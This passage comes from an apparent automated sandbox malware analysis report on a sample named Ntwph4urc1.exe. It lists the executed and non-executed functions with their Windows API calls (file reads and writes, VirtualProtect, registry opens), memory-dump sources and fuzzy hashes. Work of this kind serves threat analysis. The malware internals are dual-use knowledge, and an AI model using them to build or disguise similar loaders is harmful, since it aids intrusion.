                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 25110d3507d358ffc5cd280814017adf28e863bc9de9a665d6a16defacd6db30
                                            • Instruction ID: cd92722eb3436656978f7a4a516ca1140f7587330fd822ecd0a7e0a5635cb8a4
                                            • Opcode Fuzzy Hash: 25110d3507d358ffc5cd280814017adf28e863bc9de9a665d6a16defacd6db30
                                            • Instruction Fuzzy Hash: 874150B6610204EFEB259F76D984FA9F77DEF88324F21442AE80DC7124DA34A6418FD1
                                            Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                            • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                            Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                            Function 743529DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(7435505C,00000004,00000040,7435504C), ref: 743529FD
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 7817a52313101eed9ba15f80a0cd21d0d2f682d1a63bd3ee3eda5b534679cbc4
                                            • Instruction ID: 95cde8ab76d2f055d79c9fb84d4f0010206a1f236877cff6aac9b0d10b395a20
                                            • Opcode Fuzzy Hash: 7817a52313101eed9ba15f80a0cd21d0d2f682d1a63bd3ee3eda5b534679cbc4
                                            • Instruction Fuzzy Hash: E9F07FB2761280DEC350CF3AC444BAABBECF71C225B22452BF18CD7259E33461448B91
                                            Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                            • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                            • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                            • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                            Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                            • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                            • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                            • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                            Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                            Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                            • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                            • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                            • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                            Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                            • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                            • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                            • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                            Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                            • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                            • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                            • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629

                                            Non-executed Functions

                                            Function 00404835 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                            • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                            • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                            • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                            • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                              • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                              • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                              • Part of subcall function 0040669D: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                            • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                              • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                              • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                              • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                            • API String ID: 2624150263-647811358
                                            • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                            • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                            • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
